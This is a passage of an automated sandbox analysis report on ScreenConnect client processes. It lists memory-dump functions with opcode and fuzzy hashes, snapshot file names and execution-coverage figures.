Opcode ID: 70f2965ef05613316af2a4660f0636f204701ec07eeaecf1f97aa95a0040a8fc
Instruction ID: c0ad7d967a48c174975221d1cf2816043c65b6549503624d8debc9935bcf24c0
Opcode Fuzzy Hash: 70f2965ef05613316af2a4660f0636f204701ec07eeaecf1f97aa95a0040a8fc
Instruction Fuzzy Hash: C2F0A032A0D2515FC715CFBA9811A9BBFE9CFC9214B0981BFD08DC3681E9249802C722

Function 00CC66D8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54caee81d0afcd1fe04b2344d7b9992ac6694bca4b0f27c504aa94a1fc0c577f
Instruction ID: 17dfc50feef4b7301585b6e8e0db91817118d7be599100f7087bbf0a414cfa64
Opcode Fuzzy Hash: 54caee81d0afcd1fe04b2344d7b9992ac6694bca4b0f27c504aa94a1fc0c577f
Instruction Fuzzy Hash: 390119B0D042568ECB64DF78C544BAD7FF0AF09324F104A6DD425D7290D77486828F81

Function 00CC31F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e7e2d510684f8ce00affbc19515045db65182f0792303116adfa00b4d01af5
Instruction ID: a7d88cad41bdbd8e43b19c4733d47a2608b8b9d31cc8d72df6ffcb4dbb1661ee
Opcode Fuzzy Hash: 70e7e2d510684f8ce00affbc19515045db65182f0792303116adfa00b4d01af5
Instruction Fuzzy Hash: EBF0E77490064CEFDF04EBE8E549A9CBBB5EB44340F2081A8D605A7655DB346F84CB50

Function 00CC5920 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13af6dd7a27ac1f4cbbebc1cc59d5162bb6ae81c24566c802a20f1e8dbb0d4d4
Instruction ID: 6ed795653e267fedabeb474c74dbbf30acac8814d6438f3f169b8dbb77816b6a
Opcode Fuzzy Hash: 13af6dd7a27ac1f4cbbebc1cc59d5162bb6ae81c24566c802a20f1e8dbb0d4d4
Instruction Fuzzy Hash: B7F08231301A505FD716ABB8A45449DBFF6DBC622130441EAF406C7389DB745806D791

Function 00CCE2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f807bcb8afae8e380723df8fa4790d20729ce60d0f03c69b3a26c464f5391df0
Instruction ID: 2024e932853e350f12af209b70883ffdbf8f6c92799ec8476d29576f1db4d29c
Opcode Fuzzy Hash: f807bcb8afae8e380723df8fa4790d20729ce60d0f03c69b3a26c464f5391df0
Instruction Fuzzy Hash: 61F03470B001598FCB19DF69C554AAABBE5EF89350B048069E819CB368EB34DE41CB80

Function 00CC66E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3f7bf5ec8c9be06a58f04833acf1d7cbbef2935085efbbd3707dec73bf1602
Instruction ID: b185137cdd42f68e09c4bfdb847fa311a0a3dc979f53d52cbbe65dea8b03ed40
Opcode Fuzzy Hash: ab3f7bf5ec8c9be06a58f04833acf1d7cbbef2935085efbbd3707dec73bf1602
Instruction Fuzzy Hash: C6F01D70D0420A8FCB54DFA8C545B6E7BF0AB04324F204A6DD429D7290D7708A418F91

Function 00CCEBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3554dcd225f96cd253fbbab0ca6901d12facccc55cae707ee7179b885cfe70b
Instruction ID: e070c66a64046ce5e830893a704c148d118e750246f6aeee509970cb8ae6a546
Opcode Fuzzy Hash: d3554dcd225f96cd253fbbab0ca6901d12facccc55cae707ee7179b885cfe70b
Instruction Fuzzy Hash: D3E06D367042086B4B04CA4ED810E6BBBEEEFC9360714C0AAF81DC7355DA35DE029BA4

Function 00CC52E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7fc2e7bc8e9af7c17ecd69d463665feeb90281cf7557af27dd8e320e4cb8c4
Instruction ID: 271a0c4d7f244158d8e700567a7ad39c80cc03ff2255cca1e31eeeb67bf7831d
Opcode Fuzzy Hash: ed7fc2e7bc8e9af7c17ecd69d463665feeb90281cf7557af27dd8e320e4cb8c4
Instruction Fuzzy Hash: 04F0A072D483406FCB1A8FB4D851AADBFF1EF87310B0541AED049DB252D93449468741

Function 00CC0E20 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735feb9a511ad8cba859ccccfe41bf421c4da5355da834a51d76e0273c55aa93
Instruction ID: 86e067f88d113d5dbbc0b0438a4d8a408b954b47a5a1b402112e985f64b37de9
Opcode Fuzzy Hash: 735feb9a511ad8cba859ccccfe41bf421c4da5355da834a51d76e0273c55aa93
Instruction Fuzzy Hash: B1F0A7322483005FC755A7B8F91549E7BB1EBC131271486BEE905CB352DE329D0A8BD0

Function 00CCE270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e629e33c19e88f76f914d713f27ef69a2a870cde69dbdc122ac5f6d40e1ff7f3
Instruction ID: 2972f14bb23edbc9bf981a30e74cfc12aeba99cd1cab2db4bb891a053292192e
Opcode Fuzzy Hash: e629e33c19e88f76f914d713f27ef69a2a870cde69dbdc122ac5f6d40e1ff7f3
Instruction Fuzzy Hash: 51F0B271E002199F8B40DFADC841A9EFBF5EF49200B24806AD918E7211E331AA12CB80

Function 00CCAA58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 437c324801dbba15e5c316fc0427b68c5159df99fe696cafaaa830384eaa00b6
Instruction ID: 66c6f01d6009aec5dddbc17fcf0cec845c82c21bd9b37d7f4b5cb06420f5b704
Opcode Fuzzy Hash: 437c324801dbba15e5c316fc0427b68c5159df99fe696cafaaa830384eaa00b6
Instruction Fuzzy Hash: 41E086363053145B9B186BEFB89C52EBBDBEBC8AA1B14443DF60AC7340CE758C098795

Function 056325D1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0138bfba6035858f6d1431c746823e44c3468f9fb2a92fc63fc66db831709ff
Instruction ID: e8eb9b6a3af2877bdb4b8f2e1224b1a072d7d5989b7a85c228775d737e97b801
Opcode Fuzzy Hash: f0138bfba6035858f6d1431c746823e44c3468f9fb2a92fc63fc66db831709ff
Instruction Fuzzy Hash: 01E022363042445BCB0457BDE412A6D7B66DBC7320B4884B9E5089B212CA32E8478B90

Function 00CC0E30 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffea6197ff61496a6c1815883aea199c4af92a3a06d684fb08e891e095b8dc02
Instruction ID: b4f2c09dfa88ee1a01f9c5d3cfbbb22a2c734aa32cda5c28043f583e5b5bdfc0
Opcode Fuzzy Hash: ffea6197ff61496a6c1815883aea199c4af92a3a06d684fb08e891e095b8dc02
Instruction Fuzzy Hash: F5E0D8322002009B8704A7A9F91549E7795FBC1313710867EE90ADB351DF72DC0A4BE0

Function 00CCF94F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4f858ac5334842dd6940a1fb18a11af32e5ebaff0ed3e9c9f3c23920a9cfd7
Instruction ID: 3a9e1b881ab703ec6da95a59b499d7a7e519a8dc7ab3eb4026488f407b0cd30d
Opcode Fuzzy Hash: cc4f858ac5334842dd6940a1fb18a11af32e5ebaff0ed3e9c9f3c23920a9cfd7
Instruction Fuzzy Hash: B7E02632B052001FC314962AE8509ABB7AAEBC8324F20047DE00DD7352CD769C43C740

Function 00CCF950 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dacf3ab916f555b3d3bf39dac91dbdaf98815b58aa9f4ca05b713dd50ad9b25
Instruction ID: 02eb10fae266b0044fbe078388233a8619bf74a2523ed4b3b269bc81529d8db2
Opcode Fuzzy Hash: 3dacf3ab916f555b3d3bf39dac91dbdaf98815b58aa9f4ca05b713dd50ad9b25
Instruction Fuzzy Hash: 4AE02C32B012001BC304A62AE840A97B3AEEBC8724F20083DE10CC7302CD76AC828390

Function 05630100 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73a2558ba6d60b5515e6b6bae0469f81ad44ccd3ae0e5f3c084cd864e04265b
Instruction ID: e0f888a133e98bc0044d193c2ebefb0bf9f970b747c58bdfe0b06807efc07941
Opcode Fuzzy Hash: f73a2558ba6d60b5515e6b6bae0469f81ad44ccd3ae0e5f3c084cd864e04265b
Instruction Fuzzy Hash: 44E08C36248504AFC304AA5EE408E86BFEADFD9621B08806AF649C7320CA31DC428B94

Function 056325E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8faaaa4de5210e92083cac2fb907761bd553cafbe8b00c3854c6f0ca00ecaf5
Instruction ID: 00c20bf10cca031d7a56a7c5180b70d33df8c9c05d79530fc3dea70f58353150
Opcode Fuzzy Hash: e8faaaa4de5210e92083cac2fb907761bd553cafbe8b00c3854c6f0ca00ecaf5
Instruction Fuzzy Hash: 7FE08672301204574B14666AA40286D7799DAC7321754857DE909DB311DE72DC0B87D5

Function 00CC5979 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba108dc40dde20f963152476ed1acf03507d9e8dba205fc95db9d277195446bb
Instruction ID: 9035292e5a8945d0dc823528ce10e4b1b8173e28aedb5b718400babc246862ab
Opcode Fuzzy Hash: ba108dc40dde20f963152476ed1acf03507d9e8dba205fc95db9d277195446bb
Instruction Fuzzy Hash: B4E09A7190A689DFCB16DFB8D95064DBFF0EB4230071082EAD804DB292DB351E05DB21

Function 00CC5930 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3db2259f70c74d3c13f441b2f0fadd63a339aedbfb5bf3f679154796474664
Instruction ID: 66d63cdbe94a735861282b3ee8f85c2d22498a8848048fa92bd26d126d644dda
Opcode Fuzzy Hash: ec3db2259f70c74d3c13f441b2f0fadd63a339aedbfb5bf3f679154796474664
Instruction Fuzzy Hash: 97E08C36301E149B9708B6FDE40886E7B9AEBC922131441A6F51AC3388DF309D02E7A0

Function 00CC3257 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36fb56a091cdb5ff908188659c42e8a5858220abd92422fe91c308deca5fea8
Instruction ID: d903869ebcf9df333bc10cdc15ccca4c531c2f7150dde428afb5b940556acca3
Opcode Fuzzy Hash: c36fb56a091cdb5ff908188659c42e8a5858220abd92422fe91c308deca5fea8
Instruction Fuzzy Hash: FAE092322086454FC716DB7CF84169E7BE1AF82310B0809FAD1419B656CB64F94987D1

Function 056300C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3402838d8195d55912530a77c75f68b478fcf6e918df30f7c049bbb8fd4d7a
Instruction ID: dbd27b1364fadf7c56b7f018fc9ef3f5ecfb294a5f5f68f2ba9cb9d1ea42f93f
Opcode Fuzzy Hash: ef3402838d8195d55912530a77c75f68b478fcf6e918df30f7c049bbb8fd4d7a
Instruction Fuzzy Hash: D0E0C2366052546FC305AA68E821C97BFE88F4A21070240A7FA48CB332D5618C1087E2

Function 05630098 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8657abbe10b1a5debd8ed7b288bd6a6b89c5b9bdb2a991594da434d0fb94df70
Instruction ID: bdc1c6d61ca3333093fd8e2174fc15d7d4be741e3339ead350e13832fee11e2d
Opcode Fuzzy Hash: 8657abbe10b1a5debd8ed7b288bd6a6b89c5b9bdb2a991594da434d0fb94df70
Instruction Fuzzy Hash: DDE02E337002245FC700A61CD806BC93B99DF59228F0840BAF601CB322EAA1EC0187C2

Function 00CCAFE5 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d31d488b78fbe9bcf4b9a635d48144220c20862c867ce6d202a3dac640189a
Instruction ID: 2b0f446d21bd9ec7af10278f912919584036accaf27ddf20216fd3540d082fca
Opcode Fuzzy Hash: 22d31d488b78fbe9bcf4b9a635d48144220c20862c867ce6d202a3dac640189a
Instruction Fuzzy Hash: D8E04F7091D3809FC341DF38DD15149BFF0AE06200F0644AFD8C9C7251E635AC46CB62

Function 05630110 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa72c07651d78a729c3c4b543fb9994144d29ad92777b01aabf7030eb3b84a19
Instruction ID: 8e99c2d05a0a47da146fafe6363a1700195ffc9504969a16187b8f71a603e74c
Opcode Fuzzy Hash: aa72c07651d78a729c3c4b543fb9994144d29ad92777b01aabf7030eb3b84a19
Instruction Fuzzy Hash: 74D05E3A3045149F83049B5EE408C4ABFEAEFC9761305806AF609C7720CA71EC01CB94

Function 00CCE168 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e4de41c9d704cea13e6f3ecc1726b670d622bf6849c2efb6cf3bf8244cd9a5
Instruction ID: 87393cd8d1da83ad82b13e93cc72755feaac0466e8c70ef562c4e68ec45f5eb0
Opcode Fuzzy Hash: 09e4de41c9d704cea13e6f3ecc1726b670d622bf6849c2efb6cf3bf8244cd9a5
Instruction Fuzzy Hash: B0E012343455419FC705DBA8D851C193BB6BF8E60431945E5D5098B373C622FC25CB95

Function 00CC5988 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f178e0b6f698231bf89a695959f388c9df43bdbb5f514b511fe163ab692b15d2
Instruction ID: 56fa87148c58b2aa8abe5ecdf406ff0e266ced9a0f713500ebbf69dd60a317a2
Opcode Fuzzy Hash: f178e0b6f698231bf89a695959f388c9df43bdbb5f514b511fe163ab692b15d2
Instruction Fuzzy Hash: FBD05E71A0150CEFCB44EFB8EA0165DBBB9EB85300B2085E9D908D3300EB316F049B90

Function 00CCDF09 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd57dd8c59290249df04fe7b78b3628fccde4c29ec7dbf920d2c42ff227a26b
Instruction ID: b46763b0fae19112758acb1645bb3a9c2118cd4ddfb5b928264ddfea1a0d73b5
Opcode Fuzzy Hash: 6fd57dd8c59290249df04fe7b78b3628fccde4c29ec7dbf920d2c42ff227a26b
Instruction Fuzzy Hash: 81E012315493518FCB02CB6CEC75E5D3FB0BE4620434904CAC041CF1A7D330A401DBA1

Function 056300D8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1440285ed69df74b77a0245de006b024c0aba534fd446689b2edd54abd5e726
Instruction ID: b527a081cd54a3273b767d0f858ef27681d3a3e885a357bfbc99b652a5a42db2
Opcode Fuzzy Hash: a1440285ed69df74b77a0245de006b024c0aba534fd446689b2edd54abd5e726
Instruction Fuzzy Hash: 87D012327001289F8708EB9DE455CA67BEDDF8D6603114066FA09CB331DA71DC1197E1

Function 00CCED28 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d8a2e25e73c25c48fab45ade6ce863ca92b99ac968012b03b3269f0cc9faf5
Instruction ID: 4577ce3aeb0be3589b04dc428aa127c1baedc4c80c589cf5e7bf298c0bb63ff1
Opcode Fuzzy Hash: 02d8a2e25e73c25c48fab45ade6ce863ca92b99ac968012b03b3269f0cc9faf5
Instruction Fuzzy Hash: 95E0863150474ACFC701EF68C5A9469BBF0FF85300B04878FE0855B161EB70A495D741

Function 056326C8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ab7026d18f69aee6944af9f18ef65d3a80aa4bce99a13d1dfe31451853abee
Instruction ID: 6479ed973f5ed8da62b8e70c35ed51ab15fd1bacaf77f064b05b52c2e17b33a5
Opcode Fuzzy Hash: 58ab7026d18f69aee6944af9f18ef65d3a80aa4bce99a13d1dfe31451853abee
Instruction Fuzzy Hash: 62D0C95540D3C00ED70297354C203583F231F47104B8B46D680819A1A3C02818468222

Function 00CCED38 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6184e464977d4445d9e2f5686417663d921f5fe97784820f18c00fe2c6c1ad96
Instruction ID: 4b75050bc6f75f3c3bad61d03f62a428f3c1cecfeefa4e6e38e578e7ca3ee423
Opcode Fuzzy Hash: 6184e464977d4445d9e2f5686417663d921f5fe97784820f18c00fe2c6c1ad96
Instruction Fuzzy Hash: FBD0C73141470D89C700BBB8D454469B7B8EED5250F00C65AE44957521FF70E5D0D681

Function 00CCE178 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a9a873915254cdd9e7091c171816d3e7cf607535d5702c9630f04ed685ec5d
Instruction ID: 98317bc762ccac0174a6a7284aa84806942aa5bcbd87009b0e5a6d492daedd0c
Opcode Fuzzy Hash: 75a9a873915254cdd9e7091c171816d3e7cf607535d5702c9630f04ed685ec5d
Instruction Fuzzy Hash: E5C012343406048FC308DBA8E584C1573FAAF8CA0832081A8E60E8B372CA22FC008A54

Analysis Process: ScreenConnect.WindowsClient.exePID: 4312, Parent PID: 2364COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27.3%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9B8B3642 Relevance: 1.7, APIs: 1, Instructions: 172
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE ref: 00007FFD9B8D5993

Memory Dump Source

Source File: 00000009.00000002.3556873902.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 18d25ffc7c54ff4ef4c0e1960a3250fba06957ef9838aa67d47fbebb91e3d683
Instruction ID: ae662fc28a04c03cc9ebc805828313c11747ad0074bfb467d0b81cbf362e2cf2
Opcode Fuzzy Hash: 18d25ffc7c54ff4ef4c0e1960a3250fba06957ef9838aa67d47fbebb91e3d683
Instruction Fuzzy Hash: 83518071918A1C8FDB68EF589845BE9B7E0FB59720F1442AEE04DD3251CB70A9418BC1

Function 00007FFD9BBC5621 Relevance: 1.2, Instructions: 1213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6985f72f5daf0440d2b7fdd6012c101d812302253e626765c84b726198f4808
Instruction ID: c5072a0916f474406df7e426a7b8d56b83c7a6032e8d870a939ef16e1b3e8e65
Opcode Fuzzy Hash: a6985f72f5daf0440d2b7fdd6012c101d812302253e626765c84b726198f4808
Instruction Fuzzy Hash: 9182E631B0EA5E4BEBB9E76C84756B967D2FF98344F56007AD44EC31E6DD28A902C340

Function 00007FFD9BBC5834 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76e469d033ca5e18589793c07434b37964d1df4a4e8d5cfd9f016bb9244ae93
Instruction ID: 19acca9b13f76b89dd2363b47553cb5cb4fc160f1aa1513dccbc6db1f0576e30
Opcode Fuzzy Hash: c76e469d033ca5e18589793c07434b37964d1df4a4e8d5cfd9f016bb9244ae93
Instruction Fuzzy Hash: F6E1EB30B0A91F4EEBB5FBAC8471AB962D2FF94344F560579D44EC31E6DE28B902C641

Function 00007FFD9BBC62E9 Relevance: .4, Instructions: 358COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b24c99423554d3faafdc37ec4b6fc01eb4136b1cef088839c7dafab6c0f6d61e
Instruction ID: 73f7bdb8980023277b1ed243b47df2f480006c0c209249db2aa895a5102c82fb
Opcode Fuzzy Hash: b24c99423554d3faafdc37ec4b6fc01eb4136b1cef088839c7dafab6c0f6d61e
Instruction Fuzzy Hash: 52C1BC30B1A91F4AE775F7AC8471AB962D2FF94344F56047AD44EC31E6DD28B902C640

Function 00007FFD9B8B8014 Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8B8142

Memory Dump Source

Source File: 00000009.00000002.3556873902.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
